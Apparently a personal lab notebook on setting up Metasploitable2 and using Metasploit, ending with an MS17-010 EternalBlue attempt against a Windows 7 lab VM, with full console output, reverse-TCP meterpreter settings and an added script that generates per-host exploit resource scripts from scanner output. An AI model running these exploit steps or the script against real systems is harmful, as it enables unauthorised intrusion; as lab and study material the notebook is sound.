Metasploitable2
Metasploitable is a deliberately vulnerable target VM based on Ubuntu. Because every service on it is exploitable, keep it on an isolated (host-only or NAT) virtual network and never bridge it onto a real LAN or expose it to the internet.
After downloading it, just open the VM image in your hypervisor; no installation step is needed.
The default username and password are both msfadmin.
# Set a root password
sudo passwd root
# Configure a static IP (replace the xxx values with addresses on your lab network)
vi /etc/network/interfaces
auto eth0
iface eth0 inet static
address xxx.xxx.xxx.xxx
netmask 255.255.255.0
gateway xxx.xxx.xxx.xxx
# Restart networking to apply the change
/etc/init.d/networking restart
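A typo in the interfaces stanza (a gateway outside the subnet, an octet above 255) leaves the target unreachable until you go back to the VM console, so it is worth checking the triple before writing it. The script below is an added example, not part of the original notes: it validates an address/netmask/gateway set and prints the eth0 stanza. The 192.168.197.x addresses it uses are assumptions for a lab network; substitute your own.

```sh
#!/bin/sh
# Added example, not part of the original notes: sanity-check an address /
# netmask / gateway triple before it goes into /etc/network/interfaces, then
# print the eth0 stanza. All addresses below are assumptions for a lab network.

# Return 0 if $1 is a well-formed dotted-quad IPv4 address (four decimal octets 0-255).
valid_ipv4() {
  case $1 in
    ""|*[!0-9.]*|.*|*.|*..*) return 1 ;;
  esac
  _old_ifs=$IFS; IFS=.
  set -- $1
  IFS=$_old_ifs
  [ $# -eq 4 ] || return 1
  for _octet in "$@"; do
    case $_octet in 0?*) return 1 ;; esac   # reject leading zeros (octal ambiguity)
    [ "$_octet" -le 255 ] || return 1
  done
  return 0
}

# Dotted quad -> 32-bit integer (caller must have validated the address first).
ip2int() {
  _old_ifs=$IFS; IFS=.
  set -- $1
  IFS=$_old_ifs
  echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# Return 0 if $1 is a contiguous netmask (a run of 1-bits followed only by 0-bits).
valid_netmask() {
  _m=$(ip2int "$1")
  _inv=$(( ~_m & 4294967295 ))
  [ $(( _inv & (_inv + 1) )) -eq 0 ]
}

# Return 0 if address $1 and gateway $2 fall in the same subnet under netmask $3.
same_subnet() {
  _a=$(ip2int "$1"); _g=$(ip2int "$2"); _m=$(ip2int "$3")
  [ $(( _a & _m )) -eq $(( _g & _m )) ]
}

# Print an /etc/network/interfaces stanza for eth0 after checking the inputs.
# Usage: gen_interfaces ADDRESS NETMASK GATEWAY
gen_interfaces() {
  _address=$1; _netmask=$2; _gateway=$3
  for _x in "$_address" "$_netmask" "$_gateway"; do
    valid_ipv4 "$_x" || { echo "invalid IPv4 address: $_x" >&2; return 1; }
  done
  valid_netmask "$_netmask" \
    || { echo "non-contiguous netmask: $_netmask" >&2; return 1; }
  [ "$_gateway" != "$_address" ] \
    || { echo "gateway must differ from the host address" >&2; return 1; }
  same_subnet "$_address" "$_gateway" "$_netmask" \
    || { echo "gateway $_gateway is not in $_address/$_netmask" >&2; return 1; }
  cat <<EOF
auto eth0
iface eth0 inet static
address $_address
netmask $_netmask
gateway $_gateway
EOF
}

# Demo with assumed lab addresses; redirect into /etc/network/interfaces on the
# target once the output looks right, then restart networking.
gen_interfaces 192.168.197.60 255.255.255.0 192.168.197.2
```

After `/etc/init.d/networking restart`, confirm the result from the VM console with `ifconfig eth0` before relying on SSH to reach the target.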
Metasploit Framework
msf uses a PostgreSQL database (for hosts, services, credentials and loot), so start it in Kali first:
# Start postgresql
systemctl start postgresql
# Start it automatically at boot
systemctl enable postgresql
msfconsole itself does not start PostgreSQL. If the database is down it still runs, just without database support (db_status reports no connection and nothing is persisted between sessions). On Kali, msfdb init initializes and starts the database, and msfdb run starts it and then launches msfconsole.
The connect command
connect talks to a host much like netcat does, but it goes through any session pivoting you have configured (routes through existing sessions), which is what makes it useful during internal network penetration.
msf6 > connect
Usage: connect [options]

Communicate with a host, similar to interacting via netcat, taking advantage of any configured session pivoting.

OPTIONS:

    -C  Try to use CRLF for EOL sequence.
    -P  Specify source port.
    -S  Specify source address.
    -c  Specify which Comm to use.
    -h  Help banner.
    -i  Send the contents of a file.
    -p  List of proxies to use.
    -s  Connect with SSL.
    -u  Switch to a UDP socket.
    -w  Specify connect timeout.
    -z  Just try to connect, then return.

msf6 > connect xuegod.cn 80
[*] Connected to xuegod.cn:80 (via: 0.0.0.0:0)
get / HTTP/1.1

HTTP/1.1 400 Bad Request
Server: nginx/1.6.2
Date: Thu, 21 Jan 2021 08:05:06 GMT
Content-Type: text/html
Content-Length: 172
Connection: close

400 Bad Request
400 Bad Request
nginx/1.6.2
The 400 is expected: the request was typed as lowercase get (HTTP methods are case-sensitive) and, as an HTTP/1.1 request, carried no Host header, so nginx rejected it. The exchange still does the job of a banner grab, since the Server header reveals nginx/1.6.2.
The show command
show options   list the options of the current module, with their current values and whether each is required
show payloads and show targets list the payloads and targets compatible with the current module; show -h lists the other subcommands.
The search command
search name:mysql          modules whose name contains mysql
search path:mysql          modules under a path containing mysql
search platform:mysql      modules whose target platform field matches mysql
search cve:CVE-2017-8464   modules tagged with that CVE
Keywords can be combined to narrow the list, e.g. search type:exploit platform:windows name:smb.
The use command
use takes a module path and switches the prompt into that module's context. After a search, the index number from the result table can be given instead of the full path; since the index depends on the last search, check that the path shown in the new prompt is the one you meant:
msf6 > search cve:8464

Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  exploit/windows/fileformat/cve_2017_8464_lnk_rce  2017-06-13       excellent  No     LNK Code Execution Vulnerability
   1  exploit/windows/local/cve_2017_8464_lnk_lpe       2017-06-13       excellent  Yes    LNK Code Execution Vulnerability

Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/local/cve_2017_8464_lnk_lpe

msf6 > use 0
msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) >
The info command
info shows a module's metadata (targets, options, stability, description and references) without loading it, so it is the place to check supported targets and architectures before running anything:
msf6 > search cve:8464

Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  exploit/windows/fileformat/cve_2017_8464_lnk_rce  2017-06-13       excellent  No     LNK Code Execution Vulnerability
   1  exploit/windows/local/cve_2017_8464_lnk_lpe       2017-06-13       excellent  Yes    LNK Code Execution Vulnerability

Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/local/cve_2017_8464_lnk_lpe

msf6 > info 0

       Name: LNK Code Execution Vulnerability
     Module: exploit/windows/fileformat/cve_2017_8464_lnk_rce
   Platform: Windows
       Arch: x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-06-13

Provided by:
  Uncredited
  Yorick Koster
  Spencer McIntyre

Module stability:
  crash-service-restarts

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Windows x64
  2   Windows x86

Check supported:
  No

Basic options:
  Name      Current Setting        Required  Description
  ----      ---------------        --------  -----------
  DLLNAME   FlashPlayerCPLApp.cpl  no        The DLL file containing the payload
  FILENAME  Flash Player.lnk       no        The LNK file
  PATH                             no        An explicit path to where the files will be hosted

Payload information:
  Space: 2048

Description:
  This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)
  that contain a dynamic icon, loaded from a malicious DLL. This vulnerability is a
  variant of MS15-020 (CVE-2015-0096). The created LNK file is similar except an
  additional SpecialFolderDataBlock is included. The folder ID set in this
  SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass the CPL
  whitelist. This bypass can be used to trick Windows into loading an arbitrary DLL
  file. If no PATH is specified, the module will use drive letters D through Z so the
  files may be placed in the root path of a drive such as a shared VM folder or USB
  drive.

References:
  https://cvedetails.com/cve/CVE-2017-8464/
  https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464
  http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt
  https://msdn.microsoft.com/en-us/library/dd871305.aspx
  http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm
  https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
Using EternalBlue (MS17-010) against Win7
msf6 > search ms17_010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/ms17_010_psexec
msf6 > use 1
msf6 auxiliary(scanner/smb/smb_ms17_010) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOST=192.168.197.54
[-] Unknown variable
Usage: set [option] [value]
Set the given option to value. If value is omitted, print the current value.
If both are omitted, print options that are currently set.
If run from a module context, this will set the value in the module's
datastore. Use -g to operate on the global datastore.
If setting a PAYLOAD, this command can take an index from `show payloads'.
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.197.54
RHOST => 192.168.197.54
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.197.54:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x86 (32-bit)
[*] 192.168.197.54:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > back
msf6 > search ms17_010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/ms17_010_psexec
msf6 > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.197.53 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.197.54
RHOST => 192.168.197.54
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.197.53:4444
[*] 192.168.197.54:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.197.54:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x86 (32-bit)
[*] 192.168.197.54:445 - Scanned 1 of 1 hosts (100% complete)
[-] 192.168.197.54:445 - Exploit aborted due to failure: no-target: This exploit module only supports x64 (64-bit) targets
[*] Exploit completed, but no session was created.
The exploitation failed here because the target machine is a 32-bit system while the exploit built into MSF is 64-bit, so a 32-bit exploit needs to be installed; the reference I followed was https://blog.csdn.net/qq_41617034/article/details/91051614. Then the 32-bit exploit was used for the attack:
msf6 exploit(windows/smb/eternalblue_doublepulsar) > run
[*] Started reverse TCP handler on 192.168.197.53:4444
[*] 192.168.197.54:445 - Generating Eternalblue XML data
[*] 192.168.197.54:445 - Generating Doublepulsar XML data
[*] 192.168.197.54:445 - Generating payload DLL for Doublepulsar
[*] 192.168.197.54:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.197.54:445 - Launching Eternalblue...
[+] 192.168.197.54:445 - Backdoor is already installed
[*] 192.168.197.54:445 - Launching Doublepulsar...
[+] 192.168.197.54:445 - Remote code executed... 3... 2... 1...
[*] Exploit completed, but no session was created.
I ran it several times, but it still failed; I don't know why.
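The aborted run above is an architecture mismatch that the scanner had already reported one step earlier ("x86 (32-bit)"): ms17_010_eternalblue in this version lists a single x64 target, whereas ms17_010_psexec (index 4 in the same search results, the EternalRomance/Synergy/Champion module) handles both 32- and 64-bit targets and performs its own named-pipe check, so it is the built-in option for a 32-bit Win7 without resorting to the Wine-based eternalblue_doublepulsar module. The script below is an added example, not part of the original notes or of Metasploit: it reads the scanner's "Host is likely VULNERABLE" lines, picks the module whose targets match the reported architecture, and writes an msfconsole resource script per host. The sample scanner lines are constructed (the .55 host is invented), and the LHOST value is an assumption.

```sh
#!/bin/sh
# Added example, not from the original notes or from Metasploit itself: turn the
# output of auxiliary/scanner/smb/smb_ms17_010 into a per-host exploit plan so
# the architecture the scanner reports chooses the module before anything runs.
# Module and payload names are those shown in the notes above; the scanner lines
# in SAMPLE_SCAN are constructed (the .55 host is invented) and LHOST is an assumption.

# Map the architecture the scanner reported to an MS17-010 exploit module.
# ms17_010_eternalblue lists only an x64 target in this msf version (the cause of
# the "no-target" abort above); ms17_010_psexec handles x86 and x64 over a named pipe.
pick_module() {
  case $1 in
    x64) echo exploit/windows/smb/ms17_010_eternalblue ;;
    x86) echo exploit/windows/smb/ms17_010_psexec ;;
    *)   echo "no MS17-010 module chosen for architecture '$1'" >&2; return 1 ;;
  esac
}

# Read scanner output on stdin; print "HOST ARCH" for each host flagged as vulnerable.
vulnerable_hosts() {
  while IFS= read -r _line; do
    case $_line in
      *"Host is likely VULNERABLE to MS17-010!"*) ;;
      *) continue ;;
    esac
    _host=${_line#"[+] "}      # "[+] 192.168.197.54:445 - ..." -> "192.168.197.54:445 - ..."
    _host=${_host%%:*}         # -> "192.168.197.54"
    case $_line in
      *"x64 (64-bit)"*) _arch=x64 ;;
      *"x86 (32-bit)"*) _arch=x86 ;;
      *)                _arch=unknown ;;
    esac
    echo "$_host $_arch"
  done
}

# Emit an msfconsole resource script for one host: the scanner again as a check,
# then the matching exploit with a payload of the same architecture.
# Usage: gen_rc HOST ARCH LHOST
gen_rc() {
  _module=$(pick_module "$2") || return 1
  case $2 in
    x64) _payload=windows/x64/meterpreter/reverse_tcp ;;
    *)   _payload=windows/meterpreter/reverse_tcp ;;
  esac
  cat <<EOF
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS $1
run
use $_module
set RHOSTS $1
set PAYLOAD $_payload
set LHOST $3
run
EOF
}

# Constructed sample of what the scanner prints (second host invented for the example).
SAMPLE_SCAN='[+] 192.168.197.54:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x86 (32-bit)
[+] 192.168.197.55:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.197.56:445 - Scanned 3 of 3 hosts (100% complete)
[*] Auxiliary module execution completed'

# Demo: one resource script per vulnerable host, written to stdout.
printf '%s\n' "$SAMPLE_SCAN" | vulnerable_hosts | while read -r _h _a; do
  echo "# --- $_h ($_a) ---"
  gen_rc "$_h" "$_a" 192.168.197.53 || echo "# skipping $_h"
done
```

Save one host's script to a file and feed it to msfconsole -r; "likely VULNERABLE" is a heuristic, so the scan step at the top of each script re-confirms it right before the exploit. The same idea applies to the Wine-based run above: before repeating an exploit that reports "Remote code executed" but returns no session, compare the payload architecture in show options with what the scanner reported.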